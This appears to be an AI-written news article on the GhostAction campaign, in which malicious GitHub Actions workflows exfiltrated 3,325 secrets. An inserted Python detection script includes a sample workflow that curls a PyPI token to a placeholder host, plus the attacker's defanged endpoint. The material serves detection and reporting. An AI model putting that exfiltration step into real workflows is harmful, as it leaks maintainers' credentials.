

Ethical Hacking News

Hackers' Supply Chain Attack Exposes 3,325 Secrets on GitHub


GhostAction, a sophisticated supply chain attack on GitHub, has exposed 3,325 secrets across multiple platforms, including PyPI, npm, DockerHub, GitHub, Cloudflare, and AWS. The attackers targeted several high-profile projects and compromised credentials of various companies.

  • The GhostAction campaign has compromised over 3,325 secrets across multiple platforms.
  • A sophisticated supply chain attack was carried out on several high-profile projects, including FastUUID.
  • The attack began with a malicious GitHub Actions workflow file added to the FastUUID repository.
  • The attackers injected similar commits into at least 817 repositories, stealing secrets.
  • At least nine npm packages and 15 PyPI packages are directly impacted by this exposure.
  • The attack highlights the vulnerability of software supply chains to cyberattacks.



    In a shocking revelation, researchers at GitGuardian have uncovered a sophisticated supply chain attack that has compromised 3,325 secrets across multiple platforms, including PyPI, npm, DockerHub, GitHub, Cloudflare, and AWS. The GhostAction campaign, as it is now known, targeted several high-profile projects, including the popular FastUUID project, which is used in various applications to generate unique identifiers.

    The attack began on September 2, 2025, when researchers first noticed unusual activity on the FastUUID repository. Upon further investigation, they discovered that a malicious GitHub Actions workflow file had been added to the repository, which triggered automatically on 'push' or manual dispatch. The workflow file was designed to read secrets from the project's GitHub Actions environment and exfiltrate them to an external domain controlled by the attackers.

    Initially, it seemed like a localized incident, but as researchers dug deeper, they realized that the attack was much broader in scope. They found that similar commits had been injected across at least 817 repositories, all sending secrets to the same endpoint, located at 'bold-dhawan[.]45-139-104-115[.]plesk[.]page'. The attackers had enumerated secret names from legitimate workflows and then hardcoded them into their own workflows to steal multiple secret types.
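
    A defender-side check for the workflow pattern described above, as an added example that is not code from GitGuardian or from the original article: it flags workflow files that trigger on push or manual dispatch, reference secrets, and call curl or wget against a host outside an allowlist, and separately reports a match on the endpoint named above. The function name audit_workflow, the two sample workflows and the placeholder host collector.example.invalid are constructed for illustration, and the check is a text heuristic, not a YAML parser.

```python
import re

# IoC from the article, refanged for matching (the page prints it defanged).
IOC_HOST = "bold-dhawan.45-139-104-115.plesk.page"

ON_BLOCK = re.compile(r"^on:(.*?)(?=^\S|\Z)", re.M | re.S)  # top-level 'on:' section
TRIGGER = re.compile(r"\b(push|workflow_dispatch)\b")
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.(\w+)\s*\}\}")
NET_CALL = re.compile(r"\b(?:curl|wget)\b[^\n]*?https?://([A-Za-z0-9.-]+)")


def audit_workflow(text, allowed_hosts=()):
    """Heuristic, file-level review of the text of one workflow file."""
    on_block = ON_BLOCK.search(text)
    triggers = sorted(set(TRIGGER.findall(on_block.group(1)))) if on_block else []
    secrets = sorted(set(SECRET_REF.findall(text)))
    hosts = {h.lower().rstrip(".") for h in NET_CALL.findall(text)}
    unknown = sorted(h for h in hosts if h not in allowed_hosts)
    return {
        "triggers": triggers,          # push / workflow_dispatch, per the article
        "secrets": secrets,            # secret names hardcoded in the file
        "unknown_hosts": unknown,      # curl/wget targets not on the allowlist
        "ioc_match": IOC_HOST in hosts,
        "suspicious": bool(triggers and secrets and unknown),
    }


# Constructed sample with the shape the article describes (placeholder host).
SAMPLE_SUSPECT = """\
on: [push, workflow_dispatch]
jobs:
  run:
    runs-on: ubuntu-latest
    steps:
      - run: curl -s -X POST -d "t=${{ secrets.PYPI_API_TOKEN }}" https://collector.example.invalid/
"""

# Constructed benign sample: uses a secret but makes no curl/wget call.
SAMPLE_BENIGN = """\
on:
  release:
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - run: twine upload dist/*
        env:
          TWINE_PASSWORD: ${{ secrets.PYPI_API_TOKEN }}
"""
```

    Run it over every file under .github/workflows/ in each branch and review any result with "suspicious" set before rotating the secrets it lists.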

    GitGuardian quickly sprang into action, opening GitHub issues in 573 of the impacted repositories and directly notifying the security teams of GitHub, npm, and PyPI. They also reported that over a hundred GitHub repositories had already detected the compromise and reverted the malicious changes. Shortly after, the exfiltration endpoint stopped resolving.

    According to GitGuardian, at least nine npm packages and 15 PyPI packages are directly impacted by this exposure, and may release malicious or trojanized versions at any time, until their maintainers revoke the leaked secrets. The attack has also affected several companies' entire SDK portfolios, with malicious workflows affecting their Python, Rust, JavaScript, and Go repositories simultaneously.

    Interestingly, researchers noted that there are some practical and technical similarities with the 's1ngularity' campaign that unfolded in late August. However, they do not believe there is a direct connection between the two operations.

    The GhostAction campaign highlights the vulnerability of software supply chains to cyberattacks. The fact that attackers were able to exploit compromised maintainer accounts to perform commits that added malicious workflow files underscores the need for robust security measures to protect these ecosystems.

    In response to this incident, companies and organizations are advised to take immediate action to assess their own security postures and implement additional safeguards to prevent similar attacks in the future. This may include reviewing and updating existing access controls, implementing more stringent authentication protocols, and conducting regular vulnerability assessments to identify potential weaknesses.

    As the cybersecurity landscape continues to evolve, it is essential for individuals, organizations, and governments to work together to develop effective strategies to mitigate these types of threats. By sharing knowledge, best practices, and intelligence, we can reduce the risk of such attacks and create a more secure digital environment for everyone.





  • Published: Mon Sep 8 19:06:15 2025 by llama3.2 3B Q4_K_M












